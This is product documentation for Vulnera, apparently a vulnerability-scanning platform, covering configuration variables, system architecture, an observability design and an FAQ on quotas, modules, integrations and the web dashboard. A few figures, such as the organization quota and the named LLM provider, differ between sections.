VULNERA__LLM__OPENAI__BASE_URL | Custom endpoint (for Ollama, vLLM, etc.) |
VULNERA__LLM__OPENAI__ORGANIZATION_ID | Organization ID |
Recommended models: gpt-4, gpt-4-turbo, gpt-3.5-turbo
Azure OpenAI
| Variable | Description |
|---|---|
AZURE_OPENAI_KEY | Azure API key |
VULNERA__LLM__AZURE__ENDPOINT | Azure resource endpoint |
VULNERA__LLM__AZURE__DEPLOYMENT | Deployment name |
VULNERA__LLM__AZURE__API_VERSION | API version (default: 2024-02-15-preview) |
Resilience Settings
| Variable | Description | Default |
|---|---|---|
VULNERA__LLM__RESILIENCE__ENABLED | Enable circuit breaker + retry | true |
VULNERA__LLM__RESILIENCE__MAX_RETRIES | Max retry attempts | 3 |
VULNERA__LLM__RESILIENCE__INITIAL_BACKOFF_MS | Initial backoff delay | 500 |
VULNERA__LLM__RESILIENCE__MAX_BACKOFF_MS | Maximum backoff delay | 30000 |
VULNERA__LLM__RESILIENCE__CIRCUIT_BREAKER_THRESHOLD | Failures before circuit opens | 5 |
VULNERA__LLM__RESILIENCE__CIRCUIT_BREAKER_TIMEOUT_SECS | Seconds before circuit recovery | 60 |
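For reference, the retry settings combine as follows. This sketch assumes exponential doubling between the initial and maximum delays — the exact growth factor and any jitter policy are not documented, so treat it as illustrative:

```python
INITIAL_BACKOFF_MS = 500   # VULNERA__LLM__RESILIENCE__INITIAL_BACKOFF_MS
MAX_BACKOFF_MS = 30_000    # VULNERA__LLM__RESILIENCE__MAX_BACKOFF_MS
MAX_RETRIES = 3            # VULNERA__LLM__RESILIENCE__MAX_RETRIES

def backoff_schedule() -> list[int]:
    """Delay (ms) before each retry: doubles from the initial value, capped at the max."""
    delays, delay = [], INITIAL_BACKOFF_MS
    for _ in range(MAX_RETRIES):
        delays.append(min(delay, MAX_BACKOFF_MS))
        delay *= 2
    return delays

print(backoff_schedule())  # → [500, 1000, 2000]
```

With the defaults, three retries add at most ~3.5 seconds before the circuit breaker counts the request as a failure.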
Enrichment Settings
| Variable | Description | Default |
|---|---|---|
VULNERA__LLM__ENRICHMENT__MAX_FINDINGS_TO_ENRICH | Max findings to enrich | 10 |
VULNERA__LLM__ENRICHMENT__MAX_CONCURRENT_ENRICHMENTS | Concurrent enrichment calls | 3 |
VULNERA__LLM__ENRICHMENT__INCLUDE_CODE_CONTEXT | Include code in prompts | true |
VULNERA__LLM__ENRICHMENT__MAX_CODE_CONTEXT_CHARS | Max code snippet length | 2000 |
Sandbox Configuration
The sandbox provides secure isolation for SAST and secrets detection modules.
| Variable | Description | Default |
|---|---|---|
VULNERA__SANDBOX__ENABLED | Enable sandboxing | true |
VULNERA__SANDBOX__BACKEND | Sandbox backend (see below) | landlock |
VULNERA__SANDBOX__FAILURE_MODE | Sandbox setup behavior | best_effort |
VULNERA__SANDBOX__EXECUTION_TIMEOUT_SECS | Execution timeout | 30 |
VULNERA__SANDBOX__MEMORY_LIMIT_MB | Memory limit (process backend) | 256 |
Sandbox Backends
| Backend | Description | Requirements |
|---|---|---|
landlock | Kernel-level isolation | Linux 5.13+ |
auto | Auto-detect best backend | Linux/non-Linux |
process | Fork-based isolation | Any Linux |
noop | Disable sandboxing | Not recommended |
Landlock provides near-zero overhead security using Linux kernel capabilities.
Failure modes:
| Mode | Behavior |
|---|---|
best_effort | Continue analysis if sandbox setup degrades |
fail_closed | Abort module execution if sandbox setup fails |
Cache Configuration
| Variable | Description | Default |
|---|---|---|
VULNERA__CACHE__DRAGONFLY_URL | Redis/Dragonfly URL | Optional |
VULNERA__CACHE__DEFAULT_TTL_SECS | Default cache TTL | 3600 |
Example Configuration
Minimal (Development)
DATABASE_URL='postgresql://localhost/vulnera'
VULNERA__AUTH__JWT_SECRET='dev-secret-key-at-least-32-chars!'
GOOGLE_AI_KEY='your-api-key'
Production
DATABASE_URL='postgresql://user:pass@db.example.com:5432/vulnera'
VULNERA__AUTH__JWT_SECRET='production-secret-minimum-32-chars!'
VULNERA__CACHE__DRAGONFLY_URL='redis://cache.example.com:6379'
# LLM
VULNERA__LLM__PROVIDER='google_ai'
GOOGLE_AI_KEY='your-production-key'
VULNERA__LLM__RESILIENCE__ENABLED=true
# Sandbox
VULNERA__SANDBOX__ENABLED=true
VULNERA__SANDBOX__BACKEND='landlock'
VULNERA__SANDBOX__FAILURE_MODE='best_effort'
# Server
VULNERA__SERVER__ENABLE_DOCS=false
VULNERA__SERVER__CORS_ORIGINS='https://vulnera.studio'
System Architecture (Advanced Reference)
This section provides technical details about Vulnera’s architecture for developers, integrators, and operators who need deeper understanding.
Overview
Vulnera is a modular, async Rust platform using domain-driven design (DDD) principles with a composition root wiring pattern.
┌─────────────────────────────────────────────────────────────┐
│ HTTP Server │
│ (Axum Web Framework) │
└──────────────────────────┬──────────────────────────────────┘
│
┌──────────────────────────┴──────────────────────────────────┐
│ Orchestrator │
│ (Async Job Queue + Module Registry) │
├───────────────┬──────────────┬─────────────┬────────────────┤
│ │ │ │ │
▼ ▼ ▼ ▼ ▼
Dependencies SAST Secrets API LLM
Analysis Analysis Detection Analysis Explanations
(Registries) (AST rules) (Regex+entropy) (OpenAPI) (Pangu)
Layered Architecture
Vulnera follows domain-driven design with four layers:
1. Domain Layer
Pure types, entities, traits—zero side effects
- module.rs — AnalysisModule trait (all modules implement)
- errors.rs — Domain error types
- findings.rs — Finding entity and value objects
- config.rs — Configuration value objects
- repository.rs — Repository trait definitions
Key traits:
- AnalysisModule — All modules (deps, SAST, secrets, API, LLM) implement this
- IRepository — Abstract data access
- ICache — Cache abstraction (Dragonfly/Redis only)
- IAuthenticator — Authentication logic
2. Application Layer
Use cases orchestrating domain logic
- create_analysis_job.rs — Initialize analysis job
- execute_analysis_job.rs — Run analysis modules
- enrich_findings_with_llm.rs — Add LLM explanations
- Repository implementations for data access
Key characteristics:
- Specific use cases (business logic)
- Coordinates between domain and infrastructure
- Returns domain entities (not DTOs)
3. Infrastructure Layer
HTTP clients, database queries, file I/O, parsers
- database/ — SQLx compile-time validated SQL queries
- parsers/ — AST parsing, manifest parsers
- api_clients/ — NVD, GHSA, GitHub, Pangu LLM clients
- cache/ — Dragonfly/Redis caching, compression
- auth/ — JWT and API key handling
Key characteristics:
- All external communication
- Wrapped with circuit breakers and retry logic
- Configurable via Config struct
4. Presentation Layer
Controllers, routes, DTOs
- controllers/ — HTTP handlers
- models.rs — Request/response DTOs with OpenAPI annotations
- routes.rs — Route registration
Module System
The Five Analysis Modules
Each implements AnalysisModule trait:
- Dependencies — Package registry lookups (OSV, NVD, GHSA)
- SAST — AST-based code analysis (tree-sitter)
- Secrets — Regex pattern + entropy detection
- API — OpenAPI 3.x specification analysis
- LLM — Google Gemini API for explanations/fixes
Module Selection (Rule-Based)
Input: /path/to/project
├─ package.json found → Run Dependencies
├─ .py/.js files found → Run SAST (language-specific)
├─ All files scanned → Run Secrets
├─ openapi.yaml found → Run API
└─ All findings → Optionally enrich with LLM
Data Flow: Full Analysis Job
HTTP POST /api/v1/analyze/job
│
├─→ [Auth middleware] ← Validate API key or JWT
│
├─→ [Rate limiter] ← Check quota (token-based)
│
├─→ [Create job use case]
│ ├─ Validate input
│ ├─ Create Job in database
│ └─ Push to Dragonfly job queue
│
├─→ [Worker pool] (async, configurable max_job_workers)
│ ├─ Dequeue job
│ ├─ Download/access source (git, S3, local)
│ ├─ Detect project type → Module selector
│ ├─ Run selected modules in parallel
│ │ ├─ Dependencies: concurrent registry lookups
│ │ ├─ SAST: concurrent file analysis
│ │ ├─ Secrets: concurrent file scanning
│ │ └─ API: parse OpenAPI spec
│ ├─ Aggregate findings
│ └─ Persist to database
│
└─→ Return: Job ID + status (or stream if still processing)
Concurrency Model
Tokio async runtime with configurable thread pools:
[analysis]
max_job_workers = 8 # Worker pool size
max_concurrent_packages = 8 # Per-job package lookups
max_concurrent_registry_queries = 10
max_concurrent_api_calls = 12
Concurrency impact:
- Without concurrency: 50 packages → 50 × 2s = 100 seconds
- With 8 concurrent workers: 50 packages → 6-12 seconds
- With caching: 50 packages (50% cached) → 3-6 seconds
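The speedup comes from bounding, not eliminating, parallelism. A toy reproduction of the pattern using a semaphore in Python's asyncio (delays shrunk from ~2 s to 10 ms so it runs instantly; the Rust implementation uses Tokio equivalents):

```python
import asyncio
import time

async def lookup(pkg: str, sem: asyncio.Semaphore) -> str:
    async with sem:                # at most 8 registry calls in flight
        await asyncio.sleep(0.01)  # stand-in for a ~2 s registry lookup
        return pkg

async def main() -> None:
    sem = asyncio.Semaphore(8)     # mirrors max_concurrent_packages = 8
    pkgs = [f"pkg-{i}" for i in range(50)]
    start = time.perf_counter()
    results = await asyncio.gather(*(lookup(p, sem) for p in pkgs))
    # 50 lookups complete in ~7 overlapping batches instead of 50 sequential waits
    print(f"{len(results)} lookups in {time.perf_counter() - start:.2f}s")

asyncio.run(main())
```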
Cache Architecture
Two-level caching with Dragonfly/Redis:
L1: In-Memory (100MB, 5-min TTL, optional compression)
↓ (miss)
L2: Dragonfly/Redis (24-hour TTL, 10KB compression threshold)
↓ (miss)
External: OSV, NVD, GHSA, GitHub, LLM provider APIs
Configuration:
[cache]
ttl_hours = 24
l1_cache_size_mb = 100
l1_cache_ttl_seconds = 300
enable_cache_compression = true
compression_threshold_bytes = 10240
dragonfly_url = "redis://127.0.0.1:6379"
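The L1 read path can be sketched with a get-or-fetch pattern. Names here are illustrative; compression and the Dragonfly L2 tier are collapsed into the fallback closure:

```rust
use std::collections::HashMap;
use std::time::{Duration, Instant};

/// Minimal sketch of the L1 in-memory tier: values expire after a TTL,
/// and a miss falls through to the next tier (L2/external, represented
/// here by a closure). Size limits and compression are omitted.
struct L1Cache {
    ttl: Duration,
    entries: HashMap<String, (Instant, String)>,
}

impl L1Cache {
    fn new(ttl: Duration) -> Self {
        Self { ttl, entries: HashMap::new() }
    }

    fn get_or_fetch<F: FnOnce() -> String>(&mut self, key: &str, fetch: F) -> String {
        if let Some((stored_at, value)) = self.entries.get(key) {
            if stored_at.elapsed() < self.ttl {
                return value.clone(); // L1 hit
            }
        }
        // L1 miss (or expired): fetch from the next tier and repopulate.
        let value = fetch();
        self.entries.insert(key.to_string(), (Instant::now(), value.clone()));
        value
    }
}
```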
Rate Limiting & Quota System
Token-based quota with Dragonfly backend:
GET request: 1 token
POST request: 2 tokens
Analysis operation: 3 tokens
LLM operation: 6 tokens
Tiers:
- Unauthenticated: 10 tokens/day
- API Key: 40 tokens/day
- Organization: 48 tokens/day (shared)
Daily reset: UTC midnight
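The token accounting above can be sketched as follows. This is a simplified model: `cost` and `Quota` are illustrative names, and the UTC-midnight reset is not modeled:

```rust
/// Token costs per operation type, from the quota table above.
fn cost(op: &str) -> u32 {
    match op {
        "get" => 1,
        "post" => 2,
        "analysis" => 3,
        "llm" => 6,
        _ => 0,
    }
}

/// Daily quota bucket: spending succeeds only while tokens remain.
/// The bucket resets to the tier limit at UTC midnight (not shown).
struct Quota {
    remaining: u32,
}

impl Quota {
    fn spend(&mut self, op: &str) -> Result<(), String> {
        let c = cost(op);
        if c > self.remaining {
            return Err("429 Too Many Requests: quota exhausted".to_string());
        }
        self.remaining -= c;
        Ok(())
    }
}
```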
Database Schema
PostgreSQL 12+ with SQLx compile-time validation:
Key tables:
- `users` — User accounts, authentication
- `organizations` — Team/organization grouping
- `organization_members` — Role-based membership
- `persisted_job_results` — Analysis findings (JSONB)
- `api_keys` — SHA256-hashed API keys
- `subscription_limits` — Quota tracking
Authentication & Authorization
JWT Flow
- User registers/logs in → JWT issued (httpOnly cookie)
- Middleware extracts JWT on each request
- Validates signature + expiry
- Injects user context into request
API Key Flow
- User creates API key → key is returned once at creation (never shown again)
- Stored as SHA256 hash in database
- Each request: Lookup hash, verify, use associated user
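The hash-only storage pattern can be sketched as below. Note the stand-in hash: std Rust has no SHA-256, so this sketch uses `DefaultHasher` purely for illustration, whereas production stores SHA256 hashes as described above:

```rust
use std::collections::hash_map::DefaultHasher;
use std::collections::HashMap;
use std::hash::{Hash, Hasher};

/// Stand-in for SHA-256 (illustration only; production uses a real
/// cryptographic hash). Only the *hash* of the key is ever stored.
fn digest(key: &str) -> u64 {
    let mut h = DefaultHasher::new();
    key.hash(&mut h);
    h.finish()
}

/// hash -> user id. The plaintext key is shown once at creation and
/// never persisted.
struct ApiKeyStore {
    by_hash: HashMap<u64, String>,
}

impl ApiKeyStore {
    fn create(&mut self, plaintext: &str, user: &str) {
        self.by_hash.insert(digest(plaintext), user.to_string());
    }

    /// Each request: hash the presented key and look it up.
    fn verify(&self, presented: &str) -> Option<&str> {
        self.by_hash.get(&digest(presented)).map(String::as_str)
    }
}
```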
RBAC (Role-Based Access Control)
- Owner: Full access, billing, member management
- Admin: Create jobs, manage members, view analytics
- Analyst: Create jobs, view results, comment
- Viewer: View-only access
Security Model
Defense in depth:
- HTTPS + HSTS
- CORS (configurable allowed_origins)
- CSRF tokens (POST/PUT/DELETE)
- Rate limiting (stricter for auth endpoints)
- Input validation (SQLx parameterized queries prevent SQL injection)
- Output encoding (JSON serialization)
- No secrets in logs (sensitive fields marked)
Configuration System
Strongly-typed with environment overrides:
config/default.toml (defaults)
↓
Environment variables (override)
↓
Config struct (passed to services)
Pattern: VULNERA__SECTION__KEY=value
Example: VULNERA__AUTH__JWT_SECRET=mysecret
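The `VULNERA__SECTION__KEY` convention can be sketched as a small parser. This is illustrative only; the real system merges these overrides onto the values loaded from `config/default.toml`:

```rust
use std::collections::HashMap;

/// Collect `VULNERA__SECTION__KEY=value` pairs into a
/// `"section.key" -> value` map, lower-cased, mirroring the layered
/// config: defaults first, environment overrides on top.
fn env_overrides(vars: impl Iterator<Item = (String, String)>) -> HashMap<String, String> {
    vars.filter_map(|(k, v)| {
        // Only variables with the VULNERA__ prefix participate.
        let rest = k.strip_prefix("VULNERA__")?;
        let (section, key) = rest.split_once("__")?;
        Some((format!("{}.{}", section.to_lowercase(), key.to_lowercase()), v))
    })
    .collect()
}
```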
Composition Root
Single entry point: src/app.rs
All services instantiated and wired:
1. Load config
2. Connect to external services (DB, cache, APIs)
3. Instantiate analysis modules
4. Register modules in ModuleRegistry
5. Spawn worker pool
6. Return OrchestratorState (passed to handlers)
Key principle: Never instantiate services inside module internals. Everything flows through OrchestratorState.
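The six steps can be sketched as a single `build` function. All type names here are illustrative stand-ins for the real services:

```rust
use std::sync::Arc;

/// Minimal sketch of the composition-root idea in `src/app.rs`:
/// everything is constructed once, here, and handed to handlers
/// through one shared state value.
struct Config {
    max_job_workers: usize,
}
struct ModuleRegistry {
    modules: Vec<String>,
}
struct OrchestratorState {
    config: Arc<Config>,
    registry: Arc<ModuleRegistry>,
}

fn build() -> OrchestratorState {
    // 1. Load config (defaults + env overrides in the real system).
    let config = Arc::new(Config { max_job_workers: 8 });
    // 2-4. Connect to external services and register every module.
    let registry = Arc::new(ModuleRegistry {
        modules: vec![
            "dependencies".into(),
            "sast".into(),
            "secrets".into(),
            "api".into(),
        ],
    });
    // 5-6. (Worker-pool spawn omitted.) Return the single shared state.
    OrchestratorState { config, registry }
}
```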
Performance Characteristics
Analysis speed (typical):
| Module | Time | Depends On |
|---|---|---|
| Secrets | 100ms/file | File size |
| SAST | 500ms/file | File complexity |
| API | 50ms/spec | Spec size |
| Dependencies | 1-10s/package | Registry latency |
| LLM | 1-5s/request | LLM provider latency |
Deployment Models
Docker
FROM rust:1.91 AS builder
# Build Vulnera binary...
FROM debian:bookworm
COPY --from=builder /vulnera /usr/bin/
EXPOSE 3000
CMD ["vulnera"]
Kubernetes
- Stateless API servers (replicate horizontally)
- Shared PostgreSQL database
- Shared Dragonfly cache
- Shared job queue (Dragonfly)
Scaling Considerations
Horizontal: Add API server instances behind load balancer (all stateless)
Vertical: Tune max_job_workers and max_concurrent_* settings
Resource limits:
- Memory: ~500MB base + job-dependent (~100MB per concurrent job)
- CPU: Event-driven, peaks during concurrent analysis
- Disk: Cache compression reduces storage
For More Information
- Analysis Capabilities — What each module does
- API Specification — Endpoint reference
- Configuration Guide — Tuning parameters
Orchestrator Observability Architecture
This document defines the observability architecture for the orchestration pipeline from job creation through module execution and lifecycle persistence.
Goals
- Make orchestration failures actionable in production.
- Preserve request/job context across async boundaries.
- Keep logging structured and queryable.
- Minimize hidden failure modes in state transitions.
Scope
Applies to:
- `CreateAnalysisJobUseCase`
- `ExecuteAnalysisJobUseCase`
- `JobWorkflow`
- Worker execution path in `job_queue`
Design Principles
1. Context at boundaries
   - Every public use-case/workflow entrypoint must emit structured context at start and finish.
   - Required identifiers: `job_id`, `project_id`, `module`, and transition target when applicable.
2. Error locality
   - Failures should be logged as close as possible to their source with operation-specific metadata.
   - Callers should receive typed errors; logs carry operational detail.
3. State-machine visibility
   - Every job transition (`Pending -> Queued -> Running -> Completed/Failed/Cancelled`) must be visible in logs with reason and timing.
4. Async fan-out accountability
   - Parallel module execution logs should expose:
     - module spawn
     - module completion/failure
     - aggregate completion counts
5. No panic paths in orchestration
   - Runtime errors should not panic in production paths.
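The transition rules can be encoded as a small validity check. This is a sketch: which states permit cancellation is an assumption, not something this document specifies:

```rust
/// Job lifecycle states from the orchestration state machine.
#[derive(Clone, Copy, Debug)]
enum JobStatus {
    Pending,
    Queued,
    Running,
    Completed,
    Failed,
    Cancelled,
}

/// Legal transitions for
/// `Pending -> Queued -> Running -> Completed/Failed/Cancelled`.
/// Anything else is rejected and should be surfaced as a
/// `job.lifecycle` error event, never a panic.
fn can_transition(from: JobStatus, to: JobStatus) -> bool {
    use JobStatus::*;
    matches!(
        (from, to),
        (Pending, Queued)
            | (Queued, Running)
            | (Running, Completed)
            | (Running, Failed)
            // Assumption: cancellation is allowed pre-terminal.
            | (Pending, Cancelled)
            | (Queued, Cancelled)
            | (Running, Cancelled)
    )
}
```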
Event Model
Job Lifecycle Events
- `job.lifecycle.enqueue`
- `job.lifecycle.start`
- `job.lifecycle.complete`
- `job.lifecycle.fail`
- `job.lifecycle.cancel`
Suggested fields:
- `job_id`
- `project_id`
- `status_from`
- `status_to`
- `reason`
- `duration_ms` (where applicable)
Module Execution Events
- `job.module.spawn`
- `job.module.complete`
- `job.module.error`
- `job.module.panic` (unexpected task panic)
Suggested fields:
- `job_id`
- `module`
- `duration_ms`
- `error`
Instrumentation Strategy
- Use `#[instrument]` on public async orchestration methods.
- Use `info` for lifecycle milestones.
- Use `warn` for degraded-but-continued paths.
- Use `error` for failed operations and panics.
- Include elapsed timing at operation boundaries for coarse latency tracking.
Operational Outcomes
With this architecture, operators can answer:
- Which phase is failing most often?
- Which module frequently exceeds expected runtime?
- Which jobs failed due to transition/persistence errors vs module logic?
- How long do jobs spend in each phase?
Future Extensions
- Export spans to OpenTelemetry collector.
- Add metrics counters/histograms aligned with event model.
- Correlate webhook delivery outcomes with lifecycle events.
Frequently Asked Questions (FAQ)
Quick answers to common questions about Vulnera’s features, capabilities, and usage.
Quota & Rate Limiting
How much does analysis cost in tokens?
Each operation consumes tokens from your daily quota:
| Operation | Cost |
|---|---|
| Basic analysis | 3 tokens |
| LLM explanation | 6 tokens |
| Code fix generation | 6 tokens |
| LLM query | 6 tokens |
Example: A full analysis (3) + 2 LLM features (12) = 15 tokens total.
Reference: Quota & Pricing Guide
What’s the difference between API key tier and organization tier?
| Tier | Daily Limit | Use Case |
|---|---|---|
| Unauthenticated | 10 tokens | Testing, no auth |
| API Key | 40 tokens | Single integration |
| Organization | 48 tokens | Team usage, shared quota |
Team quota pools together: If an org has 5 members, all members share the 48-token daily limit (no per-member quota).
Can I increase my quota?
Yes. Options:
- Organization tier — Upgrade to shared team quota (100 tokens/day)
- Premium plan — Contact Vulnera for higher limits
- On-premise — Deploy Vulnera privately with unlimited quota
What happens when I exceed my quota?
You receive a `429 Too Many Requests` error.
Quota resets at 00:00 UTC every day.
Offline Capabilities
What can Vulnera analyze offline (without internet)?
| Module | Offline | Notes |
|---|---|---|
| SAST | ✅ Yes | AST pattern matching (Python, JS/TS, Rust, Go, C/C++) |
| Secrets | ✅ Yes | Regex pattern matching + entropy |
| API | ✅ Yes | OpenAPI schema analysis |
| Dependencies | ❌ No | Requires CVE database |
| LLM | ❌ No | Requires LLM provider API |
CLI offline scan:
vulnera analyze --source ./my-project --modules sast,secrets,api
# No internet required
Can I use Vulnera without an internet connection?
Partial. The CLI can run offline scans for SAST, Secrets, and API analysis. Dependency scanning requires internet (to fetch CVE data from registries).
Analysis Accuracy & False Positives
Why do I have false positives in secret detection?
Common causes:
1. Test/example secrets — hardcoded in docs or tests
   - Fix: add to `.vulnera-ignore` or use entropy baseline filters
2. Placeholder values — keys like `YOUR_API_KEY_HERE`
   - Fix: entropy score filters exclude most placeholders
3. High-entropy strings — random tokens in logs
   - Fix: configure entropy thresholds per secret type
False positive rate: <5% for high-confidence secrets (AWS keys, private certs)
Reference: Secrets Detection
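The entropy filtering mentioned above can be illustrated with a plain Shannon-entropy function. This is a sketch; the actual thresholds and per-secret-type tuning are configuration details:

```rust
use std::collections::HashMap;

/// Shannon entropy in bits per character: near zero for repetitive
/// placeholders, high for random-looking tokens. Thresholding on this
/// value is one way placeholder strings are filtered out.
fn shannon_entropy(s: &str) -> f64 {
    let mut counts: HashMap<char, usize> = HashMap::new();
    for c in s.chars() {
        *counts.entry(c).or_insert(0) += 1;
    }
    let n = s.chars().count() as f64;
    counts
        .values()
        .map(|&c| {
            let p = c as f64 / n;
            -p * p.log2()
        })
        .sum()
}
```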
How accurate is SAST analysis?
Detection rates:
| Vulnerability | Confidence | False Positives |
|---|---|---|
| SQL Injection | 95-98% | <3% |
| Cross-Site Scripting (XSS) | 93-97% | <4% |
| Command Injection | 92-95% | <5% |
| Hardcoded Secrets | 98%+ | <2% |
Limitation: Cannot detect business logic flaws or complex multi-step attacks.
Why didn’t Vulnera detect a vulnerability I know exists?
Possible reasons:
1. Dynamic code patterns — code generated at runtime
   - SAST analyzes the static AST; runtime patterns require dynamic analysis (planned on the roadmap)
2. Complex data flow — multi-step taint chains
   - Default taint depth is 3 hops; increase with `--taint-depth=5`
3. Custom sanitizers — user-defined security functions not recognized
   - Configure in `.vulnera.toml` under `sast.custom_sanitizers`
4. False negative filtering — some detections suppressed to reduce noise
   - Enable with `--analysis-depth=full`
Reference: SAST Analysis
ML vs. LLM
What’s the difference between ML models and LLM features?
| Aspect | ML Models (Detection) | LLM Features (Explanation) |
|---|---|---|
| Purpose | Find vulnerabilities | Explain & fix vulnerabilities |
| Technology | Pattern matching, AST parsing, entropy | Google Gemini |
| Speed | <1 second | 3-10 seconds |
| Offline | ✅ Yes | ❌ No |
| Cost | 3 tokens | 6 tokens |
| Deterministic | ✅ Same input = same output | ❌ May vary slightly |
Are ML models proprietary?
Detection models (SAST, Secrets, API) are rule-based and open-source:
- SAST: tree-sitter AST patterns (GitHub open-source)
- Secrets: Entropy + regex patterns (public detection fingerprints)
- API: OpenAPI schema validation (OWASP standards)
LLM explanations use Google Gemini.
Can I use Vulnera without LLM features?
Yes. All detection modules work offline:
vulnera analyze --source . --modules sast,secrets,api,dependencies
# No LLM explanations, but full analysis completed
LLM is optional for:
- Explanations (`vulnera explain-finding <id>`)
- Code fixes (`vulnera generate-fix <id>`)
- Natural language queries (`vulnera query "How do I...?"`)
Customization
Can I customize SAST rules?
Yes, three ways:
1. Update existing rules:

   # .vulnera.toml
   [sast]
   rule_overrides = { "SQL_INJECTION" = { severity = "high", enabled = true } }

2. Add custom rules:

   # .vulnera/custom_rules.py
   @sast_rule("CUSTOM_XSS")
   def check_unescaped_output(node):
       """Check for unescaped user input in HTML templates"""
       # Custom pattern matching logic

3. Disable noisy rules:

   [sast.disabled_rules]
   "LOW_ENTROPY_STRING" = true
   "COMMENTED_SECRET" = true
Reference: SAST Analysis
Can I filter out certain secret types?
Yes:
# .vulnera.toml
[secrets]
ignored_patterns = [
"GITHUB_TOKEN_PLACEHOLDER", # Exact string match
"^test_.*", # Regex patterns
]
# Or ignore by file
ignored_files = [
"docs/examples.md",
"tests/fixtures/**"
]
Command line:
vulnera analyze . --secrets-ignore-patterns="test_,example_"
Integration
How do I integrate Vulnera into GitHub Actions?
name: Security Scan
on: [push, pull_request]
jobs:
vulnera:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- uses: vulnera-dev/vulnera-action@v1
with:
api-key: ${{ secrets.VULNERA_API_KEY }}
analysis-depth: standard
fail-on-severity: high
Reference: DevSecOps Quick Start
Can I scan S3 buckets?
Yes:
vulnera analyze --source s3://my-bucket/project \
--aws-credentials-from-env
Requirements:
- AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY environment variables
- The supplied AWS credentials must have read access to the bucket
Reference: Cloud Engineer Quick Start
Does Vulnera support enterprise deployments?
Yes, three options:
- SaaS (api.vulnera.studio) — Fully managed
- Self-hosted Docker — On your infrastructure
- Kubernetes helm chart — Enterprise clusters
Reference: Architecture - Deployment Models
Performance
How long does analysis take?
Typical times (standard depth):
| Source | Size | Time |
|---|---|---|
| Small repo (5K LOC) | <1 MB | 2-5 sec |
| Medium repo (50K LOC) | 5-10 MB | 10-30 sec |
| Large repo (800K LOC) | 50-100 MB | 1-5 min |
Optimization:
# Faster (minimal depth)
vulnera analyze . --analysis-depth=minimal # 2-3 sec
# Slower (full depth)
vulnera analyze . --analysis-depth=full # +2-3x time
Can I parallelize scanning?
Yes:
# Scan 10 repos in parallel
for repo in repo1 repo2 ... repo10; do
vulnera analyze $repo --source-type=git &
done
wait
Concurrency limits:
- CLI: Unlimited (your machine)
- API: 50 concurrent jobs per organization
- Jobs beyond the limit are queued and still respect rate limits
Organization & Teams
How do I share results with my team?
1. Create an organization:

   vulnera org create "My Team"

2. Invite members:

   vulnera org members add teammate@company.com --role=analyst

3. Run the scan under the organization:

   vulnera analyze . --org-id=<org-id>  # Results visible to all org members
Reference: DevSecOps Quick Start
What are organization roles?
| Role | Permissions |
|---|---|
| Owner | Create/delete org, manage all settings, view all results |
| Admin | Invite members, configure scanning policies, view analytics |
| Analyst | Run scans, view results, generate reports |
| Viewer | View results only, read-only access |
Troubleshooting
Vulnera says “API Key not found” but I set VULNERA_API_KEY
Check:
echo $VULNERA_API_KEY # Verify variable is set
vulnera auth status # Check authentication
Possible causes:
- API key is revoked
- API key doesn’t have required organization access
- Environment variable not exported (use `export VULNERA_API_KEY=...`)
Analysis returns empty results but I expect findings
Check:
1. Verify modules are enabled:

   vulnera analyze . --modules=all --verbose
   # Should list sast, secrets, api, dependencies

2. Increase analysis depth:

   vulnera analyze . --analysis-depth=full  # More aggressive

3. Check file filters:

   vulnera analyze . --include-files="**/*.py,**/*.js"
LLM explanations are slow or timing out
Solutions:
- Increase timeout: `vulnera config set llm.timeout=60`
- Use organization tier for higher concurrency
- Request explanations asynchronously: `vulnera explain --async`
Dashboard & Web Platform
What is vulnera.studio?
Vulnera Studio (vulnera.studio) is the central web dashboard for managing vulnerability analysis, team collaboration, and security insights. It provides:
- Personal Dashboard — View your scans and findings
- Organization Management — Team collaboration with shared quotas
- API Key Management — Generate keys for CLI and API access
- Integrations — Connect GitHub, GitLab, Slack, webhooks
- Analytics & Reporting — Track team metrics and generate compliance reports
- Billing Management — Upgrade plans and manage subscriptions
Access: Visit https://vulnera.studio and sign in with your email.
Reference: Dashboard Guide
How do I create an organization?
Step-by-step:
- Log in to vulnera.studio
- Click + New Organization in sidebar
- Enter organization name, description, and logo (optional)
- Select plan tier (Free, Pro, Enterprise)
- Click Create — you’re now the owner
What you get:
- Shared quota pool (e.g., 48 tokens/month for Free, 1000 for Pro)
- Team member management (invite/remove members)
- Centralized reporting and analytics
- Organization API keys for CI/CD
Reference: Organization Management
How do I invite team members?
Invite members to your organization:
- Go to Settings → Members
- Click Invite Member
- Enter email address(es) and select role:
- Admin — Manage team, integrations, settings
- Member — Create scans, resolve findings
- Viewer — Read-only access (good for executives)
- Click Send Invitations
- Members receive email with join link
Roles & Permissions:
- Owner — Full access, billing, delete organization
- Admin — Members, settings, integrations (no billing)
- Member — Create/view scans, resolve findings
- Viewer — Read-only access to scans and reports
Reference: Team Collaboration
How do I generate an API key for the CLI?
Generate API key:
- Log in to vulnera.studio
- Go to Settings → API Keys
- Click Generate New Key
- Name the key (e.g., “GitHub Actions”, “Local Dev”)
- Set expiration (Never, 30 days, 90 days, 1 year)
- Click Create and copy immediately (not shown again)
- Store securely in your credential manager or CI/CD secrets
Use in CLI:
vulnera auth login --api-key YOUR_API_KEY
Use in GitHub Actions:
- name: Scan with Vulnera
env:
VULNERA_API_KEY: ${{ secrets.VULNERA_API_KEY }}
run: vulnera analyze . --all-modules
Security: Rotate API keys every 90 days. Revoke unused keys immediately.
What’s the difference between personal and organization API keys?
| Aspect | Personal Key | Organization Key |
|---|---|---|
| Quota | 40 tokens/day (your own) | Shared org quota (48/day for Free, 1000 for Pro) |
| Access | Your scans only | All org members’ scans |
| Team | Individual | Shared across team |
| Use case | Local dev, personal projects | CI/CD, team automation |
| Generated in | Settings → API Keys | Organization → Settings → API Keys |
Best practice: Use organization keys for CI/CD pipelines; personal keys for local testing.
How do I upgrade my organization’s plan?
Upgrade plan:
- Go to vulnera.studio → Settings → Billing
- Current plan and quota displayed
- Click Change Plan or Upgrade
- Select new tier (Pro, Enterprise) or add custom tokens
- Update payment method if needed
- Click Confirm Upgrade
Plan options:
- Free — 48 tokens/month, 5 members, basic integrations
- Pro — 1000 tokens/month, unlimited members, advanced integrations
- Enterprise — Custom tokens, SSO/SAML, custom domains, priority support
Downgrade: Available mid-cycle; changes take effect at next billing date.
Reference: Quota & Pricing
How do I connect GitHub for automatic scanning?
GitHub Integration setup:
- Go to vulnera.studio → Settings → Integrations → GitHub
- Click Connect GitHub
- Authorize Vulnera GitHub App (select repos or all repos)
- Enable auto-scan triggers:
- On push to main/develop
- On all pull requests
- Scheduled daily scan
